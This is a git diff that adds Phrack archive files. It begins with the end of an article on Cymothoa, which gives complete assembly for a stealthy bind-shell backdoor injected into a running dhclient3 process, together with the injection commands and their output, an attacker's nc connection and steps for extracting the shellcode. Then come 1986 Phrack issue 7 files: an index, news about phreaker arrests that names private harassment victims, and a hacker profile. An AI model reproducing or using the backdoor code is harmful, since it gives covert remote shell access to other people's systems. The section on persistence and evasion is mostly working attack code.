+case we can use some tricks to make our parasite very difficult to detect.
+
+Here's the code.
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+#
+# Single process backdoor (alarm preamble)
+#
+
+handler:
+	pusha
+
+set_signal_handler:
+	# signal(SIGALRM, handler)
+	xorl	%eax, %eax
+	xorl	%ebx, %ebx
+	mov	$48, %al
+	mov	$14, %bl
+	jmp	set_signal_handler_end
+load_handler:
+	pop	%ecx
+	subl	$0x18, %ecx # adjust %ecx to point handler()
+	int	$0x80
+	jmp	shellcode
+
+set_signal_handler_end:
+	call load_handler
+
+shellcode:
+	# check if already initialized
+	mov     $0x4d454d50, %esi  # replaced by the injector
+                                   # (persistent memory address)
+	mov     (%esi), %eax
+	cmp     $0xdeadbeef, %eax
+	je      accept_call        # jump if already initialized
+
+socket_call:
+	# call to sys_socketcall($0x01 (socket), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $0x01, %bl
+	jmp     socket_args
+load_socket_args:
+	pop     %ecx
+	int     $0x80 # %eax = socket descriptor
+
+	# save socket descriptor
+	mov     $0xdeadbeef, %ebx
+	mov     %ebx, (%esi)
+	add     $4, %esi
+	mov     %eax, (%esi)
+	sub     $4, %esi
+	jmp     fcntl_call
+
+socket_args:
+	call load_socket_args
+	.long	0x02	# AF_INET
+	.long	0x01	# SOCK_STREAM
+	.long	0x00	# NULL
+
+fcntl_call:
+	# call to sys_fcntl(socket, F_GETFL)
+	mov     %eax, %ebx
+	xorl    %eax, %eax
+	mov     $55, %al
+	xorl    %ecx, %ecx
+	mov     $3, %cl
+	int     $0x80
+	# call to sys_fcntl(socket, F_SETFL, flags | O_NONBLOCK)
+	mov     %eax, %edx
+	xorl    %eax, %eax
+	mov     $55, %al
+	mov     $4, %cl
+	orl     $0x800, %edx  # O_NONBLOCK (nonblocking socket)
+	int     $0x80
+
+bind_call:
+	# prepare sys_socketcall (bind) arguments
+	jmp     struct_sockaddr
+load_sockaddr:
+	pop     %ecx
+	push    $0x10   # sizeof(struct_sockaddr)
+	push    %ecx    # struct_sockaddr address
+	push    %ebx    # socket descriptor
+
+	# call to sys_socketcall($0x02 (bind), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $0x02, %bl
+	mov     %esp, %ecx
+	int     $0x80
+	jmp     listen_call
+
+struct_sockaddr:
+	call load_sockaddr
+	.short	0x02	# AF_INET
+	.short	0x5250	# PORT (replaced by the injector)
+	.long	0x00	# INADDR_ANY
+
+listen_call:
+	pop     %eax    # socket descriptor
+	pop     %ebx
+	push    $0x10   # queue (backlog)
+	push    %eax    # socket descriptor
+
+	# call to sys_socketcall($0x04 (listen), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $0x04, %bl
+	mov     %esp, %ecx
+	int     $0x80
+
+	# restore stack
+	pop     %edi
+	pop     %edi
+	pop     %edi
+
+accept_call:
+	# prepare sys_socketcall (accept) arguments
+	xorl    %ecx, %ecx
+	push    %ecx         # socklen_t *addrlen
+	push    %ecx         # struct sockaddr *addr
+	add     $4, %esi
+	push    (%esi)       # socket descriptor
+
+	# call to sys_socketcall($0x05 (accept), *args)
+	xorl    %eax, %eax
+	mov     $102, %al
+	xorl    %ebx, %ebx
+	mov     $0x05, %bl
+	mov     %esp, %ecx
+	int     $0x80       # %eax = file descriptor or negative (on error)
+	mov     %eax, %edx  # save file descriptor
+
+	# restore stack
+	pop     %edi
+	pop     %edi
+	pop     %edi
+
+	# check return value
+	test    %eax, %eax
+	js      schedule_next_and_return  # jump on error (negative %eax)
+
+
+fork_child:
+	# call to sys_fork()
+	xorl    %eax, %eax
+	mov     $2, %al
+	int     $0x80
+
+	test    %eax, %eax
+	jz      dup2_multiple_calls  # child continue execution
+	                             # parent schedule_next_and_return
+
+schedule_next_and_return:
+
+	# call to sys_close(socket file descriptor)
+	# (since is used only by the child process)
+	xorl    %eax, %eax
+	mov     $6, %al
+	mov     %edx, %ebx
+	int     $0x80
+
+	# call to sys_waitpid(-1, NULL, WNOHANG)
+	# (to remove zombie processes)
+	xorl    %eax, %eax
+	mov     $7, %al
+	xorl    %ebx, %ebx
+	dec     %ebx
+	xorl    %ecx, %ecx
+	xorl    %edx, %edx
+	mov     $1, %dl
+	int     $0x80
+
+	# alarm(timeout)
+	xorl    %eax, %eax
+	mov     $27, %al
+	movl    $0x53434553, %ebx    # replaced by the injector (seconds)
+	int     $0x80
+
+	# return
+	popa
+	ret
+
+dup2_multiple_calls:
+	# dup2(socket, 2), dup2(socket, 1), dup2(socket, 0)
+	xorl    %eax, %eax
+	xorl    %ecx, %ecx
+	mov     %edx, %ebx
+	mov     $2, %cl
+dup2_loop:
+	mov     $63, %al
+	int     $0x80
+	dec     %ecx
+	jns     dup2_loop
+
+execve_call:
+	# call to sys_execve(program, *args)
+	xorl    %eax, %eax
+	mov     $11, %al
+	jmp     program_path
+load_program_path:
+	pop     %ebx
+	# create argument list [program_path, NULL]
+	xorl    %ecx, %ecx
+	push    %ecx
+	push    %ebx
+	mov     %esp, %ecx
+	mov	%esp, %edx
+	int     $0x80
+
+program_path:
+	call load_program_path
+	.ascii  "/bin/sh"
+
+%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%<%
+
+A little summary of the code:
+1) Half preable, only the signal() part.
+2) Check to see if it's the first execution. This step makes use of a
+   persistent memory location, provided by the injector.
+2.1) If already initialized jump to 7
+2.2) If not initialized continue
+3) Open socket.
+4) Set nonblocking using fcntl().
+5) Bind socket to the specified port.
+6) Socket in listen mode with listen().
+7) Check if a client is connected using accept().
+7.1) No clients, jump to 9
+7.2) Client connected, continue
+8) Fork() a child process and execute a shell.
+9) Set the timer and resume host execution
+   (the second half of the preamble)
+
+For this shellcode the provided arguments are a persistent memory
+address, the port to listen on and the timer (in seconds).
+
+Finally, let's see a practical example of use.
+
+First, we must identify our host process. We need also to find a door is
+not likely to arouse suspicion.
+
+root@victim# lsof -a -i -c dhclient3
+COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
+dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
+dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
+
+Here we can see two dhclient3 processes with port 68/UDP open (bootpc): a
+good strategy for our backdoor is to listen on port 68/TCP...
+
+root@victim# ./cymothoa -p 1612 -s 13 -j 1 -y 68
+[+] attaching to process 1612
+
+ register info:
+ -----------------------------------------------------------
+ eax value: 0xfffffdfe   ebx value: 0x6
+ esp value: 0xbfff6dd0   eip value: 0xb7682430
+ ------------------------------------------------------------
+
+[+] new esp: 0xbfff6dcc
+[+] injecting code into 0xb7683000
+[+] copy general purpose registers
+[+] persistent memory at 0xb769f000 (if used)
+[+] detaching from 1612
+
+[+] infected!!!
+
+Let's see the result:
+
+root@victim# lsof -a -i -c dhclient3
+COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
+dhclient3 1232 root    5u  IPv4   4555      0t0  UDP *:bootpc
+dhclient3 1612 root    4u  IPv4   4554      0t0  UDP *:bootpc
+dhclient3 1612 root    7u  IPv4  21892      0t0  TCP *:bootpc (LISTEN)
+
+As you can see it is very difficult to see that something is wrong...
+
+Now the attacker can connect to the victim and get a shell:
+
+root@attacker# nc -vv victim_ip 68
+Connection to victim_ip 68 port [tcp/bootpc] succeeded!
+uname -a
+Linux victim 2.6.38 #1 SMP Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux
+
+We have achieved our goal: a single process backdoor :)
+
+------[ 6. Something about the injector
+
+In all these examples we always used the injector cymothoa [3].
+Some notes about this tool...
+
+The injector is very important because it allows the customization of the
+shellcode and its injection in the right areas of memory.
+
+Cymothoa wants to be an aid to developing shellcode, in several ways.
+
+In the payloads directory there are all the assembly sources created by the
+author, easily compilable with gcc:
+
+root@box# cd payloads
+root@box# ls
+clone_shellcode.s            fork_shellcode.s
+scheduled_backdoor_alarm.s   mmx_example_shellcode.s
+scheduled_setitimer.s        scheduled_alarm.s
+scheduled_tail_setitimer.s
+root@box# gcc -c scheduled_backdoor_alarm.s
+root@box#
+
+Cymothoa includes also some tools to easily extract the shellcode from
+these object files.
+
+For example bgrep [6], a binary grep, that allows to find the offset of
+of particular hexadecimal sequences:
+
+root@box# ./bgrep e8f0ffffff payloads/scheduled_backdoor_alarm.o
+payloads/scheduled_backdoor_alarm.o: 0000014b
+
+This is useful for finding the beginning of the code to extract.
+
+Once you locate the beginning and the length of the code, you can easily
+turn it into a C string with the script hexdump_to_cstring.pl.
+
+root@box# hexdump -C -s 52 payloads/scheduled_backdoor_alarm.o -n 291 | \
+          ./hexdump_to_cstring.pl
+\x60\x31\xc0\x31\xdb\xb0\x30\xb3\x0e\xeb\x08\x59\x83\xe9\x18\xcd\x80\xeb
+\x05\xe8\xf3\xff\xff\xff\xbe\x50\x4d\x45\x4d\x8b\x06\x3d\xef\xbe\xad\xde
+\x0f\x84\x81\x00\x00\x00\x31\xc0\xb0\x66\x31\xdb\xb3\x01\xeb\x14\x59\xcd
+...
+
+Once this is done you can add this string to the file payloads.h, and
+recompile cymothoa, to have a new, ready to inject, parasite.
+
+If you want to transform into parasite code you already have available,
+that's the easy way.
+
+The last thing I want to mention about cymothoa, is a little utility
+shipped with the main tool: a syscall code generator.
+
+Writing syscall based shellcodes can be a tedious work, especially if
+you must remember every syscall number and parameters.
+
+Since I am a lazy person, I've written a script able to do part of
+the hard work:
+
+root@box# ./syscall_code.pl
+Syscall shellcode generator
+Usage:
+        ./syscall_code.pl syscall
+
+For example you can use it to generate the calling sequence for the
+open syscall:
+
+root@box# ./syscall_code.pl sys_open
+sys_open_call:
+        # call to sys_open(filename, flags, mode)
+        xorl    %eax, %eax
+        mov     $5, %al
+        xorl    %ebx, %ebx
+        mov     filename, %bl
+        xorl    %ecx, %ecx
+        mov     flags, %cl
+        xorl    %edx, %edx
+        mov     mode, %dl
+        int     $0x80
+
+As you can see the script generates assembly code that marks arguments and
+corresponding registers of the syscall, as well as the call number.
+
+The code is not always 100% reliable (e.g. some syscalls require complex
+structures the script is not able to construct), but it can  greatly speed
+up the shellcode development phase.
+
+I hope you'll find it useful...
+
+------[ 7. Further reading
+
+While I was writing this article, on the defcon's website have been
+published the talks which will take place during the next edition.
+
+One of these caught my attention [7]:
+
+     Jugaad - Linux Thread Injection Kit
+
+   "... The kit currently works on Linux, allocates space inside
+    a process and injects and executes arbitrary payload as a
+    thread into that process. It utilizes the ptrace() functionality
+    to manipulate other processes on the system. ptrace() is an API
+    generally used by debuggers to manipulate(debug) a program.
+    By using the same functionality to inject and manipulate the
+    flow of execution of a program Jugaad is able to inject the
+    payload as a thread."
+
+I recommend all readers who have judged this article interesting, to follow
+this talk, because it is a similar research, but parallel to mine.
+
+My goal was to implement a stealth backdoor without creating new processes
+or threads, while the research of Aseem focuses on the creation of threads,
+to achieve the same level of stealthiness.
+
+I therefore offer my best wishes to Aseem, since I think our works are
+complementary.
+
+For additional material on "injection of code" you can see the links
+listed at the end of the document.
+
+Bye bye ppl ;)
+
+Greetings (in random order): emgent, scox, white_sheep (and all ihteam),
+sugar, renaud, bt_smarto, cris.
+
+------[ 8. Links and references
+
+[0] https://secure.wikimedia.org/wikipedia/en/wiki/Ptrace
+[1] http://dl.packetstormsecurity.net/papers/unix/elf-runtime-fixup.txt
+[2] http://www.phrack.org/issues.html?issue=58&id=4#article
+    (5 - The dynamic linker's dl-resolve() function)
+[3] http://vxheavens.com/lib/vrn00.html#c42
+[4] http://cymothoa.sourceforge.net/
+[5] http://www.exploit-db.com/exploits/13388/
+[6] http://debugmo.de/2009/04/bgrep-a-binary-grep/
+[7] https://www.defcon.org/html/defcon-19/dc-19-speakers.html#Jakhar
+
+------[ EOF
diff --git a/phrack7/1.txt b/phrack7/1.txt
new file mode 100644
index 0000000..250aa97
--- /dev/null
+++ b/phrack7/1.txt
@@ -0,0 +1,43 @@
+                                ==Phrack Inc.==
+
+                      Volume One, Issue 7, Phile 1 of 10
+
+                              September 25, 1986
+
+Welcome to Phrack VII.  I'm glad to be back to be able to create something like
+this.  It was rather hard from the hospital.  Anyway, I'd like to take you
+aside and talk to those of you who have various misconceptions about Phrack
+Inc.  First off, Phrack Inc. isn't written by myself, Knight Lightning, or
+Cheap Shades.  We merely collect the philes and distribute them in a group.
+The articles within are the sheer responsibility of the author.  If you do not
+like the philes, talk to the author, not any of us, unless it says in the phile
+that we wrote it, please.
+
+Phrack World News is merely a sub-article of Phrack Inc. and it is written by
+Knight Lightning.  He is to be addressed for all comments about his
+ever-controversial PWN, and we'd appreciate it if you'd not condemn the whole
+publication just for a few articles.
+
+Anyone can write for Phrack Inc. now.  If you have an article you'd like
+published or a story for Phrack World News, get in touch with one of us (Knight
+Lightning, Taran King, and Cheap Shades) and as long as it fits the guidelines,
+it should make it in.  If you have been one of the many ragging on Phrack Inc.,
+please, write a phile and see if you can improve our status with your help.
+Thanks for your time.  Later on.
+
+                                             Taran King
+                                    Sysop of Metal Shop Private
+
+Featured in this Phrack Inc.:
+
+1  Intro/Index by Taran King (2175 bytes)
+2  Phrack Pro-Phile of Scan Man by Taran King (7133 bytes)
+3  Hacker's Manifesto by The Mentor (3561 bytes)
+4  Hacking Chilton's Credimatic by Ryche (7758 bytes)
+5  Hacking RSTS Part 1 by The Seker (11701 bytes)
+6  How to Make TNT by The Radical Rocker (2257 bytes)
+7  Trojan Horses in Unix by Shooting Shark (12531 bytes)
+8  Phrack World News VI Part 1 by Knight Lightning (15362 bytes)
+9  Phrack World News VI Part 2 by Knight Lightning (16622 bytes)
+10 Phrack World News VI Part 3 by Knight Lightning (16573 bytes)
+_______________________________________________________________________________
diff --git a/phrack7/10.txt b/phrack7/10.txt
new file mode 100644
index 0000000..b4cabbf
--- /dev/null
+++ b/phrack7/10.txt
@@ -0,0 +1,298 @@
+                                ==Phrack Inc.==
+
+                     Volume One, Issue 7, Phile 10 of 10
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                      *^=-> Phrack World News <-=^*                      PWN
+PWN                                                                         PWN
+PWN                             Issue VI/Part 3                             PWN
+PWN                                                                         PWN
+PWN                         Compiled and Written by                         PWN
+PWN                                                                         PWN
+PWN                            Knight Lightning                             PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+HoloPhax Phreaker Vs. USA                                         July 16, 1986
+-------------------------
+The following is a segment taken out of the summons served to HoloPhax Phreaker
+on the above date.  The actual summons was over 10 pages long and was mostly
+depositions from witnesses and/or other testimonies that incriminate HoloPhax
+Phreaker.  I am of course substituting HoloPhax Phreaker for his real name.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -- - - -
+  The United States of America and the State of Florida Vs. HoloPhax Phreaker
+
+U.S. and Florida Citizen HoloPhax Phreaker, is believed and under suspicion of
+such to have violated the following state and federal laws:
+
+   U.S. Copyright Laws
+   U.S. Telephone Infringement Act
+   Florida State Telephone Harassment Laws
+
+Reported a false emergency to or harassing the following
+STATE bureaus:
+
+   Seminole County Police Department
+   Seminole County Fire Department
+   Orange County Emergency Line (911)
+   Orange County Police Department
+   Orange County Fire Department
+   Orange County Bomb Squad
+   Orange County Special Weapons Attack Team (S.W.A.T.)
+
+and the following FEDERAL bureaus:
+
+   Federal Bureau of Investigation (F.B.I.), Tampa office
+   Federal Bureau of Investigation (F.B.I.), Orlando office
+   United States Secret Service, Orlando office
+   National Security Agency, Washington D.C. office
+   Central Intelligence Agency (C.I.A.), Washington D.C. office
+   Internal Revenue Service (I.R.S.), Tallahassee office
+   United States Marine Patrol, Titusville office
+
+and to have harassed the following private citizens or companies:
+
+          John F. Sheehan          Bob Driscol          Erwin V. Cohen
+          Phillip Minkov           Margaret Branch      Harley Pritchard
+          Gladys Smith             Kathleen Gallop      Frank Yarish
+          Aida Smith               Ron L. Ebbing        Pat C. McCoy
+          Kent Schlictemier        Doyle E. Bennet      Arthur Meyer
+
+Rape Crisis Center
+Poison Control
+Spouse Abuse
+Koala Treatment Center
+Chemical Dependency Unit
+Florida Hospital Center for Psychiatry
+Orlando General Hospital; Alcohol and Chemical Dependency Unit
+Cocaine Hot Line
+
+U.S. and Florida Citizen HoloPhax Phreaker is also believed and suspected of
+the following felonies and/or misdemeanors:
+
+Illegal manipulation of telephone company controlled conversations and devices
+Fraudulent Use of a Credit Card (i.e.: Carding)
+Grand Theft
+Possession of Stolen Property
+Defrauding the Telephone Company (i.e.: Phreaking)
+Illegal Entry (i.e.: Hacking)
+Annoying or Harassing calls
+Theft
+Breaking and Entering
+Assault and Battery
+Harassment of a Government Emergency line
+Threats to the life of the President of the United States of America
+Possible Treason to the United States of America
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Well, wasn't that nice, especially the parts about *treason* and threats to the
+life of the President of The United States of America.  HoloPhax Phreaker
+claims that the majority of the crimes, including all of the harassment
+charges, were committed on an Alliance Teleconference that he was NOT in
+control of and as such had no control over what/who was called and what hap
+pened.  One example of this has to do with threatening the life of the
+President, HoloPhax says that this was done on a confer ence with the U.S.
+Secret Service.
+
+It all started with a phone call at about 12:30 PM on July 16, 1986.  The call
+was placed from a CB (Citizen's Band) radio in a car.  They unknown caller told
+HoloPhax that the police were on their way to search his house and would be
+there in 15 minutes.  The caller also said that the law enforcement officials
+had a warrant to search HoloPhax's property, however they did not specify as to
+what was to be looked for.  HoloPhax grabbed everything he could and buried it
+all in his backyard.
+
+Sure enough, within 15 minutes his *expected* guests arrived.  One cruiser and
+four unmarked vehicles pulled up blocking his and the neighbor's driveways.
+About sixteen people came to the door and HoloPhax let them in, after all they
+did have a warrant.  Several of them pushed HoloPhax aside and then the search
+started on the first floor.  While some searched through the sofa, other
+furniture, and drawers, a couple of them flashed the warrant as well as their
+identification, U.S. Secret Service and National Security Agency.
+
+They then went up to HoloPhax's room and immediately check his phone's,
+computer's, and television's serial numbers.  They also took around 30 pictures
+of things in his room.  They then searched through stacks of worthless
+printouts and confiscated several dozen of his disks that contained pirated
+terminal programs, utilities, text files, and games.
+
+When they couldn't find any hack/phreak material or a modem, they became angry
+and started ripping the sheets off the beds, pulling up the carpet from the
+floor, and knocking on the walls.  While most of them were doing this, another
+agent handed HoloPhax a paper that stated exactly what they were looking for.
+
+He told HoloPhax that since they had not found anything on the list, they could
+only leave with what little they had and could NOT take HoloPhax into custody.
+They searched a couple of other rooms, but not as thorough as they had searched
+HoloPhax's room.  They had taken books off the shelves and flipped through
+their pages, looked inside pillow cases and under some loose boards in the
+floor.  After 1- 1 1/2 hours they finally left and said that HoloPhax would be
+contacted very soon for a hearing date.
+
+One of the more interesting members of the search team was Richard Proctor
+(See PWN 5-5 for more information on Richard Proctor).
+
+He wore little round glasses that were tinted so you couldn't see his eyes. He
+had long brown hair (longer than a business person should...) and was wearing a
+suit.  He had fair skin, but he wasn't really tan.  He looked like a mix of a
+dude out of Woodstock and someone from IBM management.  He didn't say much, and
+only spoke directly to HoloPhax once.  He asked,"Where the fuck are you hiding
+the codes!?"  HoloPhax responded with, "Go fuck your sister!"  This really
+pissed Proctor off.  Proctor then proceeded to tearing up his room pretty bad.
+He seemed to know as much about HoloPhax as the NSA and SS guys did (but then
+he was probably briefed ahead of time).
+
+There was also a representative from the local sheriff's department as well as
+one from the F.B.I.  They asked HoloPhax several questions , most of them were
+directed to a "mafia" type group called PHBI that is semi-local to HoloPhax's
+area.
+
+They seemed to want to connect HoloPhax to many "hits" PHBI had done on people,
+businesses, and the government.  They did not make clear what it was they were
+trying to say HoloPhax did, but they sure did try many ways of tricking him
+into admitting that he was a member of this group or some other phreak or
+anarchist league.
+
+Ok, now going back to the summons, it was about ten pages long and most of it
+was printouts of accounts on bulletin boards and interviews with people that
+knew something of HoloPhax's activities or activities of close aquaintences.
+
+The Infiltrator and HoloPhax used to go to the same school in 10th grade and in
+the summons there was an interview with the police officer of that school that
+mentioned some of the "jobs" that "they" had pulled there and never got caught
+for.  Infiltrator was also mentioned in a note by some guy that was named John
+Sheehan who had been harassed by phone/credit for 1 1/2 years.  He said that
+HoloPhax and Infiltrator were responsible for the 140 hours of tape he had.
+Infiltrator was also mentioned in several BBS printouts.
+
+The law enforcement officials did acquire several of the older issues of Phrack
+Inc. Newsletter and they kept trying to make HoloPhax admit to writing files on
+credit fraud, phreaking, or hacking.  Specifically, as far as hacking, were
+files on MILInet and ARPAnet.
+
+The handle they were looking for was Agent Orange, which HoloPhax had gone by
+for 6 years.  He changed his handle to HoloPhax after an incident that took
+place roughly a year ago when HoloPhax was busted for hacking Compuserve and
+N.A.S.A. accounts.  Law enforcement officers had also tried to get him for
+phreaking, but that attempt failed.
+
+As far as the mysterious phone call before the bust, HoloPhax thinks that maybe
+the PHBI got wind of what was going down and warned him.  How or why he doesn't
+know.  It is really unknown as to why he is suspected of being a member of this
+group.
+
+HoloPhax admits a guilty plea for the charges of Illegal Entry (Hacking),
+Defrauding the phone company (Phreaking), a little harassment, and possession
+of stolen property.  He pleas innocent to the rest of the charges.
+
+HoloPhax's last statement was that he will be back into hack/phreaking in the
+near (maybe distant if convicted) future.  He is always available for
+conferences if you have questions.
+
+                   Information Provided by HoloPhax Phreaker
+                    through interview with Knight Lightning
+_______________________________________________________________________________
+
+Lightman's Stories...Hoax or Fact?                                July 20, 1986
+----------------------------------
+Many of you should remember last issue's article about David Lightman and Blade
+Runner.  After that article was printed, many other points of view were brought
+up.  The following does not necessarily represent the views of Phrack, Phrack
+World News, or myself.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+According to Ryche, a phreak in the 214 NPA, David Lightman doesn't like Blade
+Runner because of both the P.H.I.R.M. and Worlds Grave Elite kicking him out as
+Co-Sysop of that board.
+
+This of course made David Lightman very angry and he decided to change Blade
+Runner's phone number.  This of course made Blade Runner very angry as well and
+since he is over 18 years of age, he decided to call David's father and let him
+know what his son has been up to.  Supposedly father and son had a long talk
+and David lost his modem privileges for a while.
+
+Ryche also cleared up the rumor about Blade Runner working for Southwestern
+Bell Security.  David Lightman, using Credimatic, performed a credit check on a
+name that he thought was Blade Runner's, but was in reality a relative of Blade
+Runner.  Anyway what David found was that this person worked for ITT.  Now as
+many of you should know, ITT has many subsidiaries that are non-Telcom related.
+Nevertheless, David interpreted this guy as being Blade Runner and then for
+unknown reasons started telling people that Blade worked for Southwestern Bell
+Security.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+That was all Ryche had to say about the Lightman/Runner Controversy.  This is
+what he says about David Lightman's "so-called" involvement with Captain
+Midnight and the Administration Voice Mailbox.
+
+When Lightman started his Administration Mailbox, several of the local rodents
+decided to inform the FBI that Lightman was providing a way to defraud the
+phone company in the mailbox service.  From then on, the FBI must have been
+monitoring the mailbox themselves and when David told everyone that Captain
+Midnight could receive messages there and that he called every week, this must
+have made things very interesting.
+
+Ryche also added," Dave set out to make everyone think he knew Captain Midnight
+and he could reach him. He has also, in the past on phone conversations, said
+that Captain Midnight was on Administration Board 1 or some Administration
+board.  He has also told me and a few others that he was in the Legion Of
+Doom."
+                         Information Provided By Ryche
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Almost all of the above article was from posts on the Phrack board on Metal
+Shop Private.  David Lightman said that all of what Ryche says is lies, but
+that he was sick of discussing it and did not want to bring it up again.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+July 23, 1986
+
+One Wednesday, July 23, 1986 a new message appeared on David Lightman's Voice
+Mailbox that said something like this, 'Attention, please listen! From this day
+forward, I will no longer be calling any BBSes.  I have run into trouble and I
+cannot discuss it over the phone line.  Telecom College and the Secret Passage
+on Castle Alcazar will be turned over to Radar Detr.  Any associates of mine
+are warned to be very careful.  Any sysop whose BBS I was on is asked to delete
+my account.  Again, I can not discuss this over the phone line.  It has really
+been a blast knowing all of you guys over the past 4 years.  I have discovered
+that no one is immune to getting caught.  I have also found out [studder
+studder] that it [hacking/phreaking] is not worth the price you pay once you
+are caught.  Please give this news to Knight Lightning and have him put it in
+Phrack World News.  That is the best way I know of to warn my associates.
+Again I cannot discuss this over the phone line, please do not call back.
+That's about it, bye.'
+
+Please note that the above is not Lightman's exact words, but it is the general
+idea of what Lightman said.  Also, on the same day, Sticky Fingers a 214 NPA
+phreak got a similar message on his voice mailbox.
+
+On Wednesday evening at about 6:30 p.m. Mr. BiG, sysop of Phantasm Elite,
+received a call from David Lightman (or rather someone using DL's password).
+Lightman didn't post on this call which is unusual because Lightman always
+posts when he calls.  David Lightman logged off at about 6:45 PM.  So if this
+really was Lightman and he just didn't post then that places his "trouble" or
+bust somewhere between 6:45 PM and 10:30 PM (When I called his mailbox).
+Question:  Who gets busted in the evening?
+
+The next day, July 24, Mark Time logged on to Castle Alcazar and saw that
+Lightman was the last caller.  Again there were no new posts by David Lightman
+on the board.  So, if Lightman was busted then the law enforcement agencies do
+indeed have his BBS and password files.  The only other possibility is that
+Lightman was not busted and that this is all a hoax performed for unknown
+reasons.
+
+On the same day, Ryche called Lightman to ask what the deal was.  He refused to
+talk about it over the phone.  However, they did set a time that Lightman would
+call him from a pay phone to discuss it.  Later, Lightman called Ryche back and
+told him that he would not discuss the bust until "a few more things were
+cleared up."
+
+That evening, I learned from The Safe Cracker that David Lightman was not
+actually busted and that he had received a call from AT&T Security about Blue
+Boxing.  This could mean that they knew he boxed [however he lives in an ESS
+area] or that he was on a boxed Alliance Teleconference.  Either way it matters
+little.  Now nobody can get in touch with him and the message on his mailbox
+has changed.
+
+                Information Provided By Sticky Fingers & Ryche
+_______________________________________________________________________________
+
+
+
+
diff --git a/phrack7/2.txt b/phrack7/2.txt
new file mode 100644
index 0000000..b4356c8
--- /dev/null
+++ b/phrack7/2.txt
@@ -0,0 +1,136 @@
+                                ==Phrack Inc.==
+
+                      Volume One, Issue 7, Phile 2 of 10
+
+                            ==Phrack Pro-Phile IV==
+
+                       Written and Created by Taran King
+
+                                 June 28, 1986
+
+Welcome to Phrack Pro-Phile IV.  Phrack Pro-Phile is created to bring info to
+you, the users, about old or highly important/controversial people.  This
+month, I bring to you one of the most influential users of our times and of
+days of old...
+
+                                   Scan Man
+                                   ~~~~~~~~
+
+Scan Man is the sysop of Pirate 80 (P-80), a telcom enthusiasts' bulletin board
+in Charleston, West Virginia (304).
+-------------------------------------------------------------------------------
+Personal
+~~~~~~~~
+             Handle: Scan Man
+           Call him: Scan Man
+       Past handles: None
+      Handle origin: Thought it up while writing a scanning program.
+      Date of Birth: 8/30/53
+Age at current date: 32 years old
+             Height: 6'1
+             Weight: About 225 lbs.
+          Eye color: Green
+         Hair Color: Dark Blond to Light Brown
+          Computers: 2 TRS Model I's (one of which the BBS is run on), Tandy
+                     Model 1000 (IBM Compatible), a 132 Column Dot Matrix, a
+                     132 Column Daisy Wheel, a Model 100 Portable, a TRS Color
+                     Computer, and a backup 80 Column Dot Matrix Printer.
+  Sysop/Co-Sysop of: Pirate 80 (P-80)
+
+-------------------------------------------------------------------------------
+Scan Man started out in the BBS world about 7 years ago when he first got his
+modem, a 300 Baud Auto-Answer/Auto-Dial Micro-Connection Modem (made by Micro
+Peripheral Corp.) with tape input and output.  Pirate 80 went up 4 years ago
+this Halloween, which consisted of a TRS Model 1, 3 40 track, single sided,
+double density floppies, and a 300 baud modem (which held up until 6 months
+ago).
+
+At the time of arising, the board was put up for interests in phreaking,
+hacking, as well as pirating.  Within the first 6 months to now, Scan Man had
+gone through 6 BBS programs, and is quite satisfied with the current one.
+
+First, he started with a pirated version of TBBS 1.2, then an upgrade to 1.3,
+pirated again (occurred and at the same time a hard drive was added after a
+number of disk drive changes and modifications).  Scan Man, through his BBS
+(which was in the first 5 all phreak/hack BBS's to ever go up, and is the
+oldest phreak board in the country), has met or talked to what he considers
+"anybody who is anybody".
+
+At 11 years old, he found a few old phones, took them apart, and got them
+working, which was when his interest in telecom arose.  He was led into the
+phreak world when he became aware that he could phreak (articles he read such
+as blue box articles).  At the time, BBS's and personal computers did not exist
+at this time.
+
+The first board he called that involved phreaking was the old Pirate's Harbor.
+An anonymous message posted there had a few alternate long distance service
+codes posted.  He was very excited that he had stumbled upon this thrill and he
+spent the first year or so calling around finding exactly what everyone was
+into and from there forward he started manufacturing various devices with The
+Researcher.  They worked together and learned together.
+
+Because so much information posted was inaccurate, they did this to make it
+accurate and found out what was the real stories.  The more memorable phreak
+boards that he was on included Plovernet, (and all pre-Plovernet), L.O.D., AT&T
+Phone Center, Pirates of Puget Sound, as well as a few others which he couldn't
+remember offhand because it was so long ago.
+
+Scan Man's works as a computer consultant (systems analyst).  He checks
+security as well as enhancements, improvements, and debugging.  He's been doing
+this for about a year now.
+
+Scan Man's hack/phreak interests are unknown to his employers.  He has attended
+various things including sneaking into a seminar on the DMS-250 Digital
+Switching System, and before that, TelePub'86, and he's sneaked into other
+various telcom/computer security seminars.  He starts one project at a time and
+does things step by step.  He's very concentrated in his projects.
+
+Scan Man frowns upon groups and says, "If you're any damn good at all, you're
+going to get a reputation whether you like it or not."
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Interests: Telecommunications (modeming, phreaking, hacking, satellite
+           scanning), white water rafting, snow skiing, dancing (he used to be
+           a roller skating dance/disco instructor), and boating.
+
+Scan Man's Favorite Things
+--------------------------
